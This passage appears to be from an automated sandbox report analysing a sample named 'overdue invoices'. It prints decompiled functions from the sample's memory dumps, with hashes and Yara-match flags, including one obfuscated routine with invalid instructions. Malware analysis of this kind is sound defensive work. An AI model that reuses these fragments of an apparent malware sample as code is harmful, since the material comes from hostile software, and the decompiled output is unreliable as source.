					return E00A48DF1(__ebx, 0xc0000374, 0xa85890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                  0x00a52076
                  0x00a52078
                  0x00a5207d
                  0x00a52083
                  0x00a520a4
                  0x00a520aa
                  0x00a520ac
                  0x00a520b7
                  0x00a520ba
                  0x00a520bc
                  0x00a520c9
                  0x00a520c9
                  0x00a520d0
                  0x00a520d2
                  0x00000000
                  0x00a520d2
                  0x00a520be
                  0x00a520c3
                  0x00a520c5
                  0x00a520c7
                  0x00000000
                  0x00000000
                  0x00a520c7
                  0x00a520bc
                  0x00a520d4
                  0x00a52085
                  0x00a52085
                  0x00a520a3
                  0x00a520a3

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8fc3b8348097561ab882b46f7b34270c005cfbe7faf82248620cfa5bd6bf6f17
                  • Instruction ID: ae48b9fa6e8d9dc99a442c3b9cdb37cef5b78334d151453f3329367e52f4e52b
                  • Opcode Fuzzy Hash: 8fc3b8348097561ab882b46f7b34270c005cfbe7faf82248620cfa5bd6bf6f17
                  • Instruction Fuzzy Hash: 99F0A03A8171844ADF36AB647A023E56BA0E796311F5A1486EC9017292CE398C8BCB20
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A68D34 Relevance: .0, Instructions: 32COMMON
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E00A68D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				void* _t18;
				void* _t24;
				void* _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0xa8d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E009B7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				return L009DB640(E009D9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25,  *_t12 & 0x000000ff);
			}













                  0x00a68d34
                  0x00a68d43
                  0x00a68d4b
                  0x00a68d4e
                  0x00a68d52
                  0x00a68d5c
                  0x00a68d6e
                  0x00a68d5e
                  0x00a68d67
                  0x00a68d67
                  0x00a68d79
                  0x00a68d7a
                  0x00a68d7c
                  0x00a68d94

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c053c14e5e02842f9254af6dea6b553e460f300840a6e35fb485431153f39cf3
                  • Instruction ID: d6275b8faaecc9b73aa47a8c7d9e27b463c73b5ac6adcca349b0b93922a2c364
                  • Opcode Fuzzy Hash: c053c14e5e02842f9254af6dea6b553e460f300840a6e35fb485431153f39cf3
                  • Instruction Fuzzy Hash: 22F03070A446089FDB14EBA8D546B6EB7B8EF54700F508599F905AB391DA34D9008754
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D927A Relevance: .0, Instructions: 32COMMON
                  Download Yara Rule
                  C-Code - Quality: 54%
                  			E009D927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L009B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E009DFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E009D92C6(_t11, _t14);
				}
				return _t11;
			}





                  0x009d9295
                  0x009d9299
                  0x009d929f
                  0x009d92aa
                  0x009d92ad
                  0x009d92ae
                  0x009d92af
                  0x009d92b0
                  0x009d92b4
                  0x009d92bb
                  0x009d92bb
                  0x009d92c5

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                  • Instruction ID: f40b88d9be6fa03c17b4c56de386d2957a0bdcc8042f2ffc7ded1176a053837a
                  • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                  • Instruction Fuzzy Hash: 83E09B323809406BD711AE55DC85F57776DDFC2721F048079B5045E343C6E5DD0987A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A68CD6 Relevance: .0, Instructions: 31COMMON
                  Download Yara Rule
                  C-Code - Quality: 62%
                  			E00A68CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				void* _t17;
				void* _t22;
				void* _t23;
				void* _t24;
				signed int _t25;

				_v8 =  *0xa8d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E009B7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				return L009DB640(E009D9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24,  *_t11 & 0x000000ff);
			}













                  0x00a68ce5
                  0x00a68ced
                  0x00a68cf0
                  0x00a68cfb
                  0x00a68d0d
                  0x00a68cfd
                  0x00a68d06
                  0x00a68d06
                  0x00a68d18
                  0x00a68d19
                  0x00a68d1b
                  0x00a68d33

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 200dbad3153b5045fc9f58ac9d9485cc7a14a83423f152bb8ff5421c48b36cac
                  • Instruction ID: c66b110454cb47cd0041bea7e79db343277afe6ef1547d7119949ac9f7c11447
                  • Opcode Fuzzy Hash: 200dbad3153b5045fc9f58ac9d9485cc7a14a83423f152bb8ff5421c48b36cac
                  • Instruction Fuzzy Hash: F3F08970A04108DFCB04DBE8D946E6E77B8EF49310F504159F515EB3D1DA34D900C754
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009B746D Relevance: .0, Instructions: 31COMMON
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E009B746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E009AEB70(__ecx, 0xa879a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E009D95D0();
							L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                  0x009b746d
                  0x009b746d
                  0x009b746d
                  0x009b7471
                  0x009b7488
                  0x009ff92d
                  0x009b748e
                  0x009b7491
                  0x009b7495
                  0x009ff937
                  0x009ff93a
                  0x009ff94e
                  0x009ff953
                  0x009ff956
                  0x009ff956
                  0x009b7495
                  0x00000000
                  0x009b7488
                  0x009b7473
                  0x009b7478
                  0x009b747d
                  0x009b7481
                  0x00000000
                  0x009b7481
                  0x009b747d
                  0x009b747a
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f2a399149832fde609770aaffbf56ee3ad83b9e54a150ba035ec4c7ba9688b4b
                  • Instruction ID: b11d655d2f7df4f02267ac79bf7f3a07b00d3fa81981647989a3025d2942ecb5
                  • Opcode Fuzzy Hash: f2a399149832fde609770aaffbf56ee3ad83b9e54a150ba035ec4c7ba9688b4b
                  • Instruction Fuzzy Hash: 94F0B43460C144BACF0197E8CA40BF9FB77AF84371F140B65E851AB171E7689C008785
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A68B58 Relevance: .0, Instructions: 31COMMON
                  Download Yara Rule
                  C-Code - Quality: 62%
                  			E00A68B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				void* _t17;
				void* _t22;
				void* _t23;
				void* _t24;
				signed int _t25;

				_v8 =  *0xa8d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E009B7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				return L009DB640(E009D9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24,  *_t11 & 0x000000ff);
			}













                  0x00a68b67
                  0x00a68b6f
                  0x00a68b72
                  0x00a68b7d
                  0x00a68b8f
                  0x00a68b7f
                  0x00a68b88
                  0x00a68b88
                  0x00a68b9a
                  0x00a68b9b
                  0x00a68b9d
                  0x00a68bb5

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 855dedd6c2cccce4567c150d1e9e3a62a08c82d21057eec953c1fcc875d16276
                  • Instruction ID: 5bfd1b067beae3982a2462cd211a1cf3a023eefcf0129441e9a601042041ea6d
                  • Opcode Fuzzy Hash: 855dedd6c2cccce4567c150d1e9e3a62a08c82d21057eec953c1fcc875d16276
                  • Instruction Fuzzy Hash: CDF082B0A44258ABDB10EBA8D906F6EB3B8EF44300F540559B905DB3D1EB74D900C794
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009CA44B Relevance: .0, Instructions: 29COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E009CA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0xa87b9c; // 0x0
				_t15 = __ecx;
				_t16 = L009B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E009DFA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                  0x009ca44b
                  0x009ca453
                  0x009ca472
                  0x009ca476
                  0x00000000
                  0x009ca493
                  0x009ca47a
                  0x009ca47f
                  0x009ca486
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8f2844c325dc04b3a5c3c922221ade0aa0ed9034aacd5d4811b7785ac183eac6
                  • Instruction ID: abb209a5a905abba54235405b32a4dbda747dc3114fb452673f64e27c9dc06b0
                  • Opcode Fuzzy Hash: 8f2844c325dc04b3a5c3c922221ade0aa0ed9034aacd5d4811b7785ac183eac6
                  • Instruction Fuzzy Hash: 54E02272E01820ABC2118F59AC01F66739EDBD1751F194039F505C7220D668DD02C3E1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0099F358 Relevance: .0, Instructions: 28COMMON
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E0099F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E009CF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L009B4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                  0x0099f35d
                  0x0099f361
                  0x0099f367
                  0x0099f372
                  0x0099f38c
                  0x0099f38c
                  0x0099f394

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                  • Instruction ID: fdb414aad6341f06ce740a884a8a0b0cf4d3e3769c05a5b8ebee1b9a1777a7ea
                  • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                  • Instruction Fuzzy Hash: 08E0DF32A40128FBEB21AADD9E16FAABBADDB88BA0F0001A5B904D7151D5649E00D2D0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A241E8 Relevance: .0, Instructions: 21COMMON
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E00A241E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0xa708f0);
				_t5 = E009ED08C(__ebx, __edi, __esi);
				if( *0xa887ec == 0) {
					E009AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0xa887ec == 0) {
						 *0xa887f0 = 0xa887ec;
						 *0xa887ec = 0xa887ec;
						 *0xa887e8 = 0xa887e4;
						 *0xa887e4 = 0xa887e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L00A24248();
				}
				return E009ED0D1(_t5);
			}





                  0x00a241e8
                  0x00a241ea
                  0x00a241ef
                  0x00a241fb
                  0x00a24206
                  0x00a2420b
                  0x00a24216
                  0x00a2421d
                  0x00a24222
                  0x00a2422c
                  0x00a24231
                  0x00a24231
                  0x00a24236
                  0x00a2423d
                  0x00a2423d
                  0x00a24247

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7cf5eb12a9236710f5c5cf1a8021ca10b253fb0cd29a05e633b0f246b4c3247a
                  • Instruction ID: 241a7e47b0fb58a089c55fe3cbc3ada0b1ad8f36e22efc5230b8339dce5bfd8e
                  • Opcode Fuzzy Hash: 7cf5eb12a9236710f5c5cf1a8021ca10b253fb0cd29a05e633b0f246b4c3247a
                  • Instruction Fuzzy Hash: 94F03978853740DFCBA0FFEAE90174436B4F788B11FA0812AA004872A5CF384982CF01
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A4D380 Relevance: .0, Instructions: 21COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00A4D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0099E8B0(__ecx, _a4, 0xfff);
					L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                  0x00a4d38a
                  0x00a4d39b
                  0x00a4d3b1
                  0x00000000
                  0x00a4d3b6
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                  • Instruction ID: 8e0f0cc5c12c8bafe86bad4847196e39e71c2e65812f16203f02c1b7896ac974
                  • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                  • Instruction Fuzzy Hash: 3FE0C235284244FBDF225E84CC01FA9BB26DBD07A1F204031FE085E6A1CA71AC91E6C4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009CA185 Relevance: .0, Instructions: 20COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E009CA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0xa867e4 >= 0xa) {
					if(_t5 < 0xa86800 || _t5 >= 0xa86900) {
						return L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E009B0010(0xa867e0, _t5);
				}
			}





                  0x009ca190
                  0x009ca1a6
                  0x009ca1c2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009ca192
                  0x009ca192
                  0x009ca19f
                  0x009ca19f

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f64ea65ac2da94adda8757ad8d874503a76583dea63d41983ea071de2a941789
                  • Instruction ID: 3ffa384ea7213c87b1cf7345c6bc28687afeb826ceb59c022b4e15880c3036f4
                  • Opcode Fuzzy Hash: f64ea65ac2da94adda8757ad8d874503a76583dea63d41983ea071de2a941789
                  • Instruction Fuzzy Hash: D7D02E719280041EEB2C73909E55F223212E7C0B28F34082CF1070A9E0DE60CCD0C74B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009C16E0 Relevance: .0, Instructions: 17COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E009C16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = L009C1710(0xa867e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L009B4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                  0x009c16e8
                  0x009c16ef
                  0x009c16f3
                  0x009c16fe
                  0x00000000
                  0x009c1700
                  0x009c170d
                  0x009c170d
                  0x009c16f2
                  0x009c16f2
                  0x009c16f2
                  0x009c16f2

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6804454a472e0c51bd3150f4f40fbbd6f9cd06957d9655540bd6e70b9da001e6
                  • Instruction ID: 79c4e2600852c74f5d12e90ee253fa1f18ef179f271943266f6926f756c924e1
                  • Opcode Fuzzy Hash: 6804454a472e0c51bd3150f4f40fbbd6f9cd06957d9655540bd6e70b9da001e6
                  • Instruction Fuzzy Hash: A5D0A931600200A2EA2D6B109A09F14225AEBC2B95F38006CF20B4A8C3CFB0CCA2F08D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406AB6 Relevance: .0, Instructions: 16COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00406AB6(void* __eax, void* __ecx) {

				return 1;
			}



                  0x00406ad4

                  Memory Dump Source
                  • Source File: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_overdue invoices.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 652fe5122d25945f0fc41f1be4a20b1f96d26c986d73a5ccf910a46256d4c249
                  • Instruction ID: fc568412e9c7024b3ad7bea8c6546228d585a0cd0969d05f683028c89cb9f15b
                  • Opcode Fuzzy Hash: 652fe5122d25945f0fc41f1be4a20b1f96d26c986d73a5ccf910a46256d4c249
                  • Instruction Fuzzy Hash: EAC04C77E9511587E5150849BC822F5E3A49357235F142297D806EBA51D146D4530089
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A153CA Relevance: .0, Instructions: 16COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00A153CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E009AEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                  0x00a153ca
                  0x00a153ce
                  0x00a153d9
                  0x00a153de
                  0x00a153e1
                  0x00a153e1
                  0x00a153e6
                  0x00a153f3
                  0x00000000
                  0x00a153f8
                  0x00a153fb

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                  • Instruction ID: 496bc9215a04b0124dbb8e534406977134ae894fd992e207db0be2be00bcd8df
                  • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                  • Instruction Fuzzy Hash: E5E08C31904A80DBCF12DB99C6A0F8EB7F5FBC4B40F140404B0085F621C624AC00CB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004162D8 Relevance: .0, Instructions: 15COMMON
                  Download Yara Rule
                  C-Code - Quality: 46%
                  			E004162D8(signed int __eax, signed char __ecx, signed char __edx, void* __fp0) {
				signed char _t15;
				signed int _t16;
				signed char _t21;
				signed char _t27;
				signed char _t28;
				void* _t32;
				signed int _t34;
				signed int _t36;
				signed int _t37;
				signed char _t38;
				signed int _t42;
				signed char _t44;

				L0:
				while(1) {
					L0:
					_t45 = __fp0;
					_t28 = __edx;
					_t27 = __ecx;
					_t13 = __eax;
					_t42 = __eax & 0x857f8d7f;
					if(_t44 > 0) {
						L1:
						asm("fidiv dword [esi+0x39]");
						asm("bound eax, [esi+eax+0x23faf80c]");
						goto L2;
					} else {
						L6:
						asm("sbb dl, [esi+0x12673e70]");
					}
					L7:
					asm("adc dl, [bx+si-0x6f70]");
					return _t16;
					L8:
					L2:
					asm("cli");
					_t27 = _t27 & _t36;
					asm("in eax, 0x30");
					_t37 =  *(_t27 - 0x40f9d2e1) * 0xab94401d;
					_t15 = (_t13 | 0x000000f8) ^ 0x00000064;
					asm("invalid");
					L3:
					_t16 = _t37;
					_t38 = _t15;
					if(_t42 >= 0) {
						L4:
						asm("a16 retf");
						asm("cmpsd");
						 *(_t32 + 0x26610dbe) =  *(_t32 + 0x26610dbe) >> _t27;
						asm("pushfd");
						asm("cdq");
						asm("out dx, al");
						asm("out 0x70, eax");
						asm("loop 0x62");
						asm("adc al, 0x64");
						asm("in eax, 0xbe");
						asm("std");
						asm("les esi, [ebx-0x5d]");
						_t21 = _t28;
						_t45 = _t45 +  *_t21;
						asm("xlatb");
						 *((_t16 - 0x0000005d | 0x000000e2) + 0x2d035fc1 & 0x2009a5b5) =  *((_t16 - 0x0000005d | 0x000000e2) + 0x2d035fc1 & 0x2009a5b5) ^ _t38 + 0x00000001;
						asm("int1");
						asm("invalid");
						fs =  *_t27;
						_t36 = _t34;
						_pop(_t34);
						_push(0x4b3c285b);
						_t13 = _t21 | 0x00000077;
						_t44 = _t21 | 0x00000077;
						asm("movsd");
						asm("cld");
						asm("invalid");
						_t28 = 0xa9303857;
						continue;
					}
					goto L7;
				}
			}















                  0x004162d8
                  0x004162d8
                  0x004162d8
                  0x004162d8
                  0x004162d8
                  0x004162d8
                  0x004162d8
                  0x004162db
                  0x004162de
                  0x00416265
                  0x00416265
                  0x00416268
                  0x00000000
                  0x004162e0
                  0x004162e0
                  0x004162e3
                  0x004162e3
                  0x004162e7
                  0x004162e7
                  0x004162f3
                  0x00000000
                  0x0041626b
                  0x0041626d
                  0x0041626e
                  0x00416270
                  0x00416276
                  0x00416280
                  0x00416282
                  0x00416284
                  0x00416284
                  0x00416284
                  0x00416285
                  0x00416287
                  0x00416287
                  0x0041628c
                  0x0041628d
                  0x00416296
                  0x00416297
                  0x00416298
                  0x00416299
                  0x0041629c
                  0x0041629e
                  0x004162a1
                  0x004162a3
                  0x004162a9
                  0x004162b1
                  0x004162b2
                  0x004162b4
                  0x004162b5
                  0x004162b7
                  0x004162b8
                  0x004162ba
                  0x004162bc
                  0x004162bc
                  0x004162c1
                  0x004162c6
                  0x004162c6
                  0x004162c8
                  0x004162cf
                  0x004162d0
                  0x004162d7
                  0x00000000
                  0x004162d7
                  0x00000000
                  0x00416285

                  Memory Dump Source
                  • Source File: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_overdue invoices.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3fdf6414054b6e99eb58d5fccdafce50427c39a4a55b6d03fb0e28c62cc2126a
                  • Instruction ID: c140db4565f03b1451ae4bd924bb8cd760100e55a90de3222601f3e665618d29
                  • Opcode Fuzzy Hash: 3fdf6414054b6e99eb58d5fccdafce50427c39a4a55b6d03fb0e28c62cc2126a
                  • Instruction Fuzzy Hash: EDC08C92E842840892220F393D001B9FB74AD9B423F0022EBCC8CA31118603C4294398
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009C35A1 Relevance: .0, Instructions: 12COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E009C35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E009AEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                  0x009c35a1
                  0x009c35a1
                  0x009c35a5
                  0x009c35ab
                  0x009c35ab
                  0x009c35b5
                  0x00000000
                  0x009c35c1
                  0x009c35b7

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                  • Instruction ID: bfdb6f68804a924d0632bf0dcea706b384a153090b2861612a1b85db5de1e924
                  • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                  • Instruction Fuzzy Hash: F7D0A931C021C09EDB01AB10C228F6833B6BB0030CF68E06DB00A068D2C33A4F0AD642
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009AAAB0 Relevance: .0, Instructions: 12COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E009AAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
